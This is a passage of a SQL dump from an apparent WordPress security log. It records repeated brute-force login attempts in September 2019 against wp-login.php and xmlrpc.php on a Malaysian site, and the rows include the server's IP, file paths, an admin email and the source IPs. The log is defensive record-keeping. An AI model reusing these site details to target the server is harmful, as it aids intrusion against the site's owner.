15:49:32',18258040,19555168,'https://bintara.com.my/xmlrpc.php',1,0,'47.91.229.187'),(25098,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"47.91.229.187\";s:11:\"REMOTE_PORT\";s:5:\"44276\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYJSCioT36h4YaCzO-ALzwAAAZc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568821770.2333\";s:12:\"REQUEST_TIME\";s:10:\"1568821770\";}}','notice','2019-09-18 15:49:31','2019-09-18 15:49:30',17743200,19233912,'https://bintara.com.my/wp-login.php',1,0,'47.91.229.187'),(25097,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"142.4.1.222\";s:11:\"REMOTE_PORT\";s:5:\"58724\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYJOn3cOb4UlVF5wccH6rAAAAcw\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568820895.3749\";s:12:\"REQUEST_TIME\";s:10:\"1568820895\";}}','notice','2019-09-18 15:34:56','2019-09-18 15:34:55',18257480,19554392,'https://bintara.com.my/xmlrpc.php',1,0,'142.4.1.222'),(25096,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"142.4.1.222\";s:11:\"REMOTE_PORT\";s:5:\"58156\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYJOnCoT36h4YaCzO-AKrAAAAYk\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568820892.3093\";s:12:\"REQUEST_TIME\";s:10:\"1568820892\";}}','notice','2019-09-18 15:34:53','2019-09-18 15:34:52',17740528,19232240,'https://bintara.com.my/wp-login.php',1,0,'142.4.1.222'),(25095,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"198.199.83.232\";s:11:\"REMOTE_PORT\";s:5:\"45900\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYJMuyR0vdvYEIduPCL5GwAAAQE\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568820411.5818\";s:12:\"REQUEST_TIME\";s:10:\"1568820411\";}}','notice','2019-09-18 15:26:52','2019-09-18 15:26:51',18256664,19554680,'https://bintara.com.my/xmlrpc.php',1,0,'198.199.83.232'),(25094,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"198.199.83.232\";s:11:\"REMOTE_PORT\";s:5:\"45070\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYJMuCoT36h4YaCzO-AJ5QAAAYQ\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568820408.394\";s:12:\"REQUEST_TIME\";s:10:\"1568820408\";}}','notice','2019-09-18 15:26:49','2019-09-18 15:26:48',17740760,19232440,'https://bintara.com.my/wp-login.php',1,0,'198.199.83.232'),(25093,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"68.183.224.174\";s:11:\"REMOTE_PORT\";s:5:\"39874\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYJJEXcOb4UlVF5wccH2rwAAAdc\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568819473.8918\";s:12:\"REQUEST_TIME\";s:10:\"1568819473\";}}','notice','2019-09-18 15:11:15','2019-09-18 15:11:14',18257928,19555272,'https://bintara.com.my/xmlrpc.php',1,0,'68.183.224.174'),(25092,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"68.183.224.174\";s:11:\"REMOTE_PORT\";s:5:\"39384\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYJJDyoT36h4YaCzO-AHngAAAZE\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568819471.3151\";s:12:\"REQUEST_TIME\";s:10:\"1568819471\";}}','notice','2019-09-18 15:11:12','2019-09-18 15:11:11',17740856,19232216,'https://bintara.com.my/wp-login.php',1,0,'68.183.224.174'),(25091,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"177.36.8.226\";s:11:\"REMOTE_PORT\";s:5:\"57202\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYJHRHcOb4UlVF5wccH1PgAAAdg\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568819012.4361\";s:12:\"REQUEST_TIME\";s:10:\"1568819012\";}}','notice','2019-09-18 15:03:33','2019-09-18 15:03:32',18258136,19557336,'https://bintara.com.my/xmlrpc.php',1,0,'177.36.8.226'),(25090,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"177.36.8.226\";s:11:\"REMOTE_PORT\";s:5:\"56494\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYJHQHcOb4UlVF5wccH1OwAAAcQ\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568819008.9686\";s:12:\"REQUEST_TIME\";s:10:\"1568819008\";}}','notice','2019-09-18 15:03:30','2019-09-18 